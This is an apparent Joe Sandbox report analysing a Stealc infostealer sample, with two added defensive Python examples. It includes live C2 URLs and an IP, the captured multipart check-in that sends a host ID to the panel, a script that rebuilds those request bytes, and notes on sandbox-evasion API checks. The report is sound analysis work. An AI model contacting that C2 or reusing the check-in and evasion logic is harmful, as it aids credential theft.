Source: Yara match | File source: 0.2.file.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php~ | 20% | Virustotal | |
http://185.215.113.37/e2b1563c6670f193.php& | 17% | Virustotal | |
http://185.215.113.37/l | 17% | Virustotal | |
http://185.215.113.37/e2b1563c6670f193.phpj | 21% | Virustotal | |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.php~ | file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php& | file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpj | file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/l | file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
Contacted IPs

IP               Domain    Country    ASN      ASN Name                 Malicious
185.215.113.37   unknown   Portugal   206894   WHOLESALECONNECTIONSNL   true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1538061
                Start date and time:2024-10-20 07:39:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 2m 46s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 88
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
Context: other samples that contacted IP 185.215.113.37

Match            Associated Sample Name   Detection   Threat Name                                                          Context
185.215.113.37   file.exe                 malicious   Stealc, Vidar                                                        185.215.113.37/e2b1563c6670f193.php
                 S3AYU5t2JP.exe           malicious   LummaC, Amadey, Stealc                                               185.215.113.37/
                 file.exe                 malicious   Stealc                                                               185.215.113.37/e2b1563c6670f193.php
                 file.exe                 malicious   Stealc, Vidar                                                        185.215.113.37/e2b1563c6670f193.php
                 file.exe                 malicious   Stealc, Vidar                                                        185.215.113.37/e2b1563c6670f193.php
                 file.exe                 malicious   Stealc                                                               185.215.113.37/e2b1563c6670f193.php
                 file.exe                 malicious   LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar    185.215.113.37/e2b1563c6670f193.php
                 file.exe                 malicious   Stealc                                                               185.215.113.37/e2b1563c6670f193.php
                 file.exe                 malicious   LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc           185.215.113.37/e2b1563c6670f193.php
                 file.exe                 malicious   Stealc                                                               185.215.113.37/e2b1563c6670f193.php
                No context
Context: other samples seen on ASN WHOLESALECONNECTIONSNL

Match                    Associated Sample Name   Detection   Threat Name                                                          Context
WHOLESALECONNECTIONSNL   file.exe                 malicious   Stealc, Vidar                                                        185.215.113.37
                         S3AYU5t2JP.exe           malicious   LummaC, Amadey, Stealc                                               185.215.113.103
                         EY5iB1Y7CH.exe           malicious   Amadey                                                               185.215.113.43
                         xvus4NLqiQ.exe           malicious   Amadey                                                               185.215.113.43
                         file.exe                 malicious   Stealc                                                               185.215.113.37
                         file.exe                 malicious   Stealc, Vidar                                                        185.215.113.37
                         file.exe                 malicious   Stealc, Vidar                                                        185.215.113.37
                         file.exe                 malicious   Stealc                                                               185.215.113.37
                         file.exe                 malicious   LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar    185.215.113.103
                         file.exe                 malicious   Stealc                                                               185.215.113.37
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.948656094880637
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'846'784 bytes
                MD5:ad1b355860fd1ac789fef08c2723416e
                SHA1:b8c30d3b010012c818d1f104118c4f8b511dad41
                SHA256:42f5eafd03f379e54bc398fb2f502393b381aa1a58068cbcd65ae8d9f5263beb
                SHA512:9c9c593f89db471b3f63959638be191c5f73e46fac1ae2b8a8c55cc8de4464e61d18a5c99a8ffcafb6d5b37782854cb17a02f6a40cb6d80f8887956a6f8bccc5
                SSDEEP:49152:jsso79jx/BBb+PUvQ0IILQHHpo/ZC57oP:AD71x/6PUvZ4Hpo/ZCZE
                TLSH:CC85339A6B5CB481C02D4AB1EDDFBF54BFA58D21C4A05B71AD9B41308979336CE3E870
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash:00928e8e8686b000
                Entrypoint:0xa9a000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint instruction:jmp 00007F996069EDFAh
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
Data directories

Name                                   Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0               0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0x25d050          0x64           .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x0               0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0               0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x25d1f8          0x8            .idata
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0               0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0               0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x0               0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0               0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0
Sections

Name       Virtual Address   Virtual Size   Raw Size   MD5                                Xored PE   ZLIB Complexity       File Type              Entropy              Characteristics
(none)     0x1000            0x25b000       0x22800    fca92594be49b880de7e040d88e29811   unknown    unknown               unknown                unknown              DATA, RWX
.rsrc      0x25c000          0x1000         0x0        d41d8cd98f00b204e9800998ecf8427e   False      0                     empty                  0.0                  DATA, RW
.idata     0x25d000          0x1000         0x200      c60c4959cc8d384ac402730cc6842bb0   False      0.1328125             data                   0.9064079259880791   DATA, RW
(none)     0x25e000          0x29e000       0x200      b0ff7e7fe20d9af301f90e1a33637f20   unknown    unknown               unknown                unknown              DATA, RWX
qmfnotwd   0x4fc000          0x19d000       0x19cc00   9a58345f19907bc3c6eeabc7c70fa9e8   False      0.9949935645063598    data                   7.953945835356761    DATA, RWX
bvdxcoxs   0x699000          0x1000         0x400      e5884fbbcb4fc719a4b5048247941a89   False      0.791015625           data                   6.072644121644343    DATA, RWX
.taggant   0x69a000          0x3000         0x2200     e8b3171e58083e40597776c97793c88c   False      0.07134650735294118   DOS executable (COM)   0.7693587921391196   DATA, RWX

Characteristics legend: DATA = IMAGE_SCN_CNT_INITIALIZED_DATA; RWX = IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_EXECUTE; RW = IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE. "(none)" marks the two sections whose name field holds no printable characters, which is what the "PE file contains section with special chars" signature refers to.

Reading the table against the header fields above: the entry point 0xa9a000 is image base 0x400000 plus RVA 0x69a000, the first byte of .taggant, so execution starts outside any conventional code section; every executable section is also writable; the unnamed section at 0x25e000 occupies 0x29e000 bytes in memory but only 0x200 on disk, the layout of an image whose real code is written into that space at run time; and qmfnotwd, which carries almost all of the file's bytes, has an entropy of 7.95, consistent with compressed or encrypted content.
Imports

DLL            Import
kernel32.dll   lstrcpy

A single static import is consistent with the "Extensive use of GetProcAddress" signature: the execution graph below shows the sample building its real import set at run time through LoadLibraryA and GetProcAddress after the first layer has unpacked.
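The following Python is an added example and is not part of the Joe Sandbox report. It transcribes the section table, image base and entry point printed above and re-derives the static indicators the signature list names (entry point outside a standard section, unnamed sections, RWX sections, a large on-disk-versus-in-memory gap, high entropy). The thresholds (entropy above 7.5, virtual size more than 8 times raw size) and the list of "standard" code section names are assumptions of this example, not values from the report; the section entropies are transcribed, and the shannon_entropy helper shows how such a value is computed when the raw section bytes are available.

```python
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Section characteristic flags (winnt.h values).
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA


@dataclass(frozen=True)
class Section:
    name: str                 # "" for the two sections the report prints without a name
    virtual_address: int      # RVA
    virtual_size: int
    raw_size: int
    characteristics: int
    entropy: Optional[float]  # None where the report shows "unknown"


# Transcribed from the report's section table and PE header fields (not re-measured here).
IMAGE_BASE = 0x400000
ENTRY_POINT = 0xA9A000        # reported as image base + RVA
SECTIONS = [
    Section("",         0x001000, 0x25B000, 0x022800, DATA | RWX, None),
    Section(".rsrc",    0x25C000, 0x001000, 0x000000, DATA | RW,  0.0),
    Section(".idata",   0x25D000, 0x001000, 0x000200, DATA | RW,  0.906),
    Section("",         0x25E000, 0x29E000, 0x000200, DATA | RWX, None),
    Section("qmfnotwd", 0x4FC000, 0x19D000, 0x19CC00, DATA | RWX, 7.954),
    Section("bvdxcoxs", 0x699000, 0x001000, 0x000400, DATA | RWX, 6.073),
    Section(".taggant", 0x69A000, 0x003000, 0x002200, DATA | RWX, 0.769),
]

# Assumptions of this example, not values taken from the report.
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}
SECTION_NAME_RE = re.compile(r"^\.?[A-Za-z0-9_$]{1,8}$")
HIGH_ENTROPY = 7.5
INFLATION_FACTOR = 8


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform): what the Entropy column measures."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_for_rva(sections: List[Section], rva: int) -> Optional[Section]:
    """Map an RVA to the section whose virtual range contains it."""
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + s.virtual_size:
            return s
    return None


def entry_point_section(sections: List[Section], image_base: int, entry_point: int) -> Optional[str]:
    s = section_for_rva(sections, entry_point - image_base)
    return s.name if s else None


def suspicious_indicators(sections: List[Section], image_base: int, entry_point: int) -> List[Tuple[str, str]]:
    """(section, reason) pairs for the static indicators named in the report's signature list."""
    findings: List[Tuple[str, str]] = []
    ep = entry_point_section(sections, image_base, entry_point)
    if ep not in STANDARD_CODE_SECTIONS:
        findings.append(("<none>" if ep is None else (ep or "<unnamed>"),
                         "entry point outside standard code section"))
    for s in sections:
        label = s.name or "<unnamed>"
        if not SECTION_NAME_RE.match(s.name):
            findings.append((label, "unnamed or non-standard section name"))
        if (s.characteristics & RWX) == RWX:
            findings.append((label, "RWX section"))
        if s.raw_size == 0:
            findings.append((label, "no data on disk"))
        elif s.virtual_size > INFLATION_FACTOR * s.raw_size:
            findings.append((label, "virtual size far exceeds raw size (filled at run time)"))
        if s.entropy is not None and s.entropy > HIGH_ENTROPY:
            findings.append((label, "high entropy (packed or encrypted)"))
    return findings


if __name__ == "__main__":
    print("entry point section:", entry_point_section(SECTIONS, IMAGE_BASE, ENTRY_POINT))
    for section, reason in suspicious_indicators(SECTIONS, IMAGE_BASE, ENTRY_POINT):
        print(f"{section:10} {reason}")
```

Run on the transcribed table it reports .taggant as the entry-point section and flags both unnamed sections, all five RWX sections, the two sections that are far larger in memory than on disk, and qmfnotwd for entropy; the same functions can be fed section records parsed from any PE with a library such as pefile.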
Suricata IDS alert

Timestamp                        SID       Signature                                         Severity   Source IP     Source Port   Dest IP          Dest Port   Protocol
2024-10-20T07:40:06.730405+0200  2044243   ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in   1          192.168.2.5   49704         185.215.113.37   80          TCP
TCP packets

Timestamp                              Source Port   Dest Port   Source IP        Dest IP
Oct 20, 2024 07:40:04.508306980 CEST   49704         80          192.168.2.5      185.215.113.37
Oct 20, 2024 07:40:05.170535088 CEST   80            49704       185.215.113.37   192.168.2.5
Oct 20, 2024 07:40:05.170638084 CEST   49704         80          192.168.2.5      185.215.113.37
Oct 20, 2024 07:40:05.176989079 CEST   49704         80          192.168.2.5      185.215.113.37
Oct 20, 2024 07:40:05.181862116 CEST   80            49704       185.215.113.37   192.168.2.5
Oct 20, 2024 07:40:06.371413946 CEST   80            49704       185.215.113.37   192.168.2.5
Oct 20, 2024 07:40:06.371526957 CEST   49704         80          192.168.2.5      185.215.113.37
Oct 20, 2024 07:40:06.375034094 CEST   49704         80          192.168.2.5      185.215.113.37
Oct 20, 2024 07:40:06.379877090 CEST   80            49704       185.215.113.37   192.168.2.5
Oct 20, 2024 07:40:06.730314970 CEST   80            49704       185.215.113.37   192.168.2.5
Oct 20, 2024 07:40:06.730405092 CEST   49704         80          192.168.2.5      185.215.113.37
Oct 20, 2024 07:40:08.972914934 CEST   49704         80          192.168.2.5      185.215.113.37
HTTP request hosts: 185.215.113.37
HTTP session

Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
0            192.168.2.5   49704         185.215.113.37   80                 2888   C:\Users\user\Desktop\file.exe
HTTP conversation (timestamp, bytes transferred, direction, data)

Oct 20, 2024 07:40:05.176989079 CEST   89 bytes   OUT
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Oct 20, 2024 07:40:06.371413946 CEST   203 bytes   IN
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2024 05:40:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 20, 2024 07:40:06.375034094 CEST   411 bytes   OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFC
Host: 185.215.113.37
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 38 36 37 45 43 30 30 41 45 41 46 32 38 31 32 36 33 31 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------JJKJDAEBFCBKECBGDBFC
Content-Disposition: form-data; name="hwid"

D867EC00AEAF281263175
------JJKJDAEBFCBKECBGDBFC
Content-Disposition: form-data; name="build"

doma
------JJKJDAEBFCBKECBGDBFC--

Oct 20, 2024 07:40:06.730314970 CEST   210 bytes   IN
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2024 05:40:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=

The POST body is the Stealc check-in that Suricata flagged: two form fields, "hwid" (a host identifier) and "build" (the build tag "doma"), and the 210-byte body matches the Content-Length header. The 8-byte reply is base64 and decodes to "block"; consistent with that, the capture shows no further requests from the client, so the panel handed this host no collection configuration.
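As an added example, not code from the report or from the Stealc family itself, the Python below rebuilds the captured check-in byte for byte from the Data Raw dump above (CHECKIN_BODY is the 210 bytes the Content-Length header announces), parses the multipart body back into its hwid and build fields, decodes the base64 reply, and applies a small detector modelled on this exchange. The detector logic (POST to a .php path, multipart/form-data, exactly the fields hwid and build) is this example's own heuristic and is not the text of Suricata rule 2044243; the multipart parser handles only simple text parts, which is all this check-in uses.

```python
import base64
import re
from typing import Dict, Tuple

# The check-in exactly as captured in the report, rebuilt from the "Data Raw" dump.
BOUNDARY = "----JJKJDAEBFCBKECBGDBFC"
CHECKIN_BODY = (
    b"------JJKJDAEBFCBKECBGDBFC\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"D867EC00AEAF281263175\r\n"
    b"------JJKJDAEBFCBKECBGDBFC\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------JJKJDAEBFCBKECBGDBFC--\r\n"
)
CHECKIN_REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFC\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 210\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
) + CHECKIN_BODY
CHECKIN_REPLY_BODY = b"YmxvY2s="  # the 8-byte response body


def parse_multipart(body: bytes, boundary: str) -> Dict[str, str]:
    """Return {field name: value} for a multipart/form-data body made of plain text parts."""
    delim = b"--" + boundary.encode("ascii")
    fields: Dict[str, str] = {}
    for part in body.split(delim):
        if part == b"" or part.startswith(b"--"):  # preamble, or the closing "--" marker
            continue
        if part.startswith(b"\r\n"):
            part = part[2:]
        if part.endswith(b"\r\n"):
            part = part[:-2]
        headers, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', headers)
        if m:
            fields[m.group(1).decode("ascii")] = value.decode("utf-8", "replace")
    return fields


def split_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    tokens = lines[0].split(b" ")
    if len(tokens) < 2:
        raise ValueError("malformed request line")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return tokens[0].decode("latin-1"), tokens[1].decode("latin-1"), headers, body


def decode_reply(body: bytes) -> str:
    """The panel answers in base64; the captured reply decodes to a one-word verdict."""
    return base64.b64decode(body).decode("utf-8", "replace")


def looks_like_stealc_checkin(raw_request: bytes) -> bool:
    """Heuristic modelled on the captured exchange (this example's own logic, not rule 2044243):
    a POST to a .php path, multipart/form-data, carrying exactly the hwid and build fields."""
    try:
        method, path, headers, body = split_request(raw_request)
    except ValueError:
        return False
    if method != "POST" or not path.endswith(".php"):
        return False
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if not ctype.startswith("multipart/form-data") or not m:
        return False
    return set(parse_multipart(body, m.group(1))) == {"hwid", "build"}


if __name__ == "__main__":
    print(parse_multipart(CHECKIN_BODY, BOUNDARY))
    print("reply:", decode_reply(CHECKIN_REPLY_BODY))
    print("check-in detected:", looks_like_stealc_checkin(CHECKIN_REQUEST))
```

The fields come back as {"hwid": "D867EC00AEAF281263175", "build": "doma"} and the reply as "block". When replaying a different capture, feed split_request the raw request from the pcap and the same three functions recover the build tag, which is the value worth pivoting on across the related samples listed in the context tables above.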



                Target ID:0
                Start time:01:39:59
                Start date:20/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x870000
                File size:1'846'784 bytes
                MD5 hash:AD1B355860FD1AC789FEF08C2723416E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true


                  Execution Graph

                  Execution Coverage:8.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10.1%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
[Execution graph: the report's node/edge dump is not reproducible as text and is summarised here. API calls that appear as nodes on the executed path, in graph order: RtlAllocateHeap and VirtualProtect (a single helper at 0x8745c0 invoked repeatedly), GetPEB, LoadLibraryA and GetProcAddress (run-time import resolution), lstrcpy, GetSystemInfo, GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, VirtualFree, GlobalMemoryStatusEx, GetUserDefaultLangID, GetProcessHeap, GetUserNameA, GetComputerNameA, lstrlen, lstrcat, OpenEventA, CreateEventA, CloseHandle, Sleep, GetSystemTime, sscanf, SystemTimeToFileTime, GetWindowsDirectoryA, InternetOpenA. GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx, GetUserNameA and SystemTimeToFileTime each lead to a conditional ExitProcess, and GetUserDefaultLangID branches to five separate ExitProcess nodes; this is the evasive API chain the signature list refers to, with the GetSystemTime/sscanf/SystemTimeToFileTime sequence comparing a parsed date against the current system time before continuing. The graph rendering is truncated at the 2000-node limit.]
API calls 14071->14072 14073 8738de 14072->14073 14074 8745c0 2 API calls 14073->14074 14075 8738f7 14074->14075 14076 8745c0 2 API calls 14075->14076 14077 873910 14076->14077 14078 8745c0 2 API calls 14077->14078 14079 873929 14078->14079 14080 8745c0 2 API calls 14079->14080 14081 873942 14080->14081 14082 8745c0 2 API calls 14081->14082 14083 87395b 14082->14083 14084 8745c0 2 API calls 14083->14084 14085 873974 14084->14085 14086 8745c0 2 API calls 14085->14086 14087 87398d 14086->14087 14088 8745c0 2 API calls 14087->14088 14089 8739a6 14088->14089 14090 8745c0 2 API calls 14089->14090 14091 8739bf 14090->14091 14092 8745c0 2 API calls 14091->14092 14093 8739d8 14092->14093 14094 8745c0 2 API calls 14093->14094 14095 8739f1 14094->14095 14096 8745c0 2 API calls 14095->14096 14097 873a0a 14096->14097 14098 8745c0 2 API calls 14097->14098 14099 873a23 14098->14099 14100 8745c0 2 API calls 14099->14100 14101 873a3c 14100->14101 14102 8745c0 2 API calls 14101->14102 14103 873a55 14102->14103 14104 8745c0 2 API calls 14103->14104 14105 873a6e 14104->14105 14106 8745c0 2 API calls 14105->14106 14107 873a87 14106->14107 14108 8745c0 2 API calls 14107->14108 14109 873aa0 14108->14109 14110 8745c0 2 API calls 14109->14110 14111 873ab9 14110->14111 14112 8745c0 2 API calls 14111->14112 14113 873ad2 14112->14113 14114 8745c0 2 API calls 14113->14114 14115 873aeb 14114->14115 14116 8745c0 2 API calls 14115->14116 14117 873b04 14116->14117 14118 8745c0 2 API calls 14117->14118 14119 873b1d 14118->14119 14120 8745c0 2 API calls 14119->14120 14121 873b36 14120->14121 14122 8745c0 2 API calls 14121->14122 14123 873b4f 14122->14123 14124 8745c0 2 API calls 14123->14124 14125 873b68 14124->14125 14126 8745c0 2 API calls 14125->14126 14127 873b81 14126->14127 14128 8745c0 2 API calls 14127->14128 14129 873b9a 14128->14129 14130 8745c0 2 API calls 14129->14130 14131 873bb3 14130->14131 14132 8745c0 2 API calls 14131->14132 14133 873bcc 14132->14133 14134 8745c0 2 API calls 
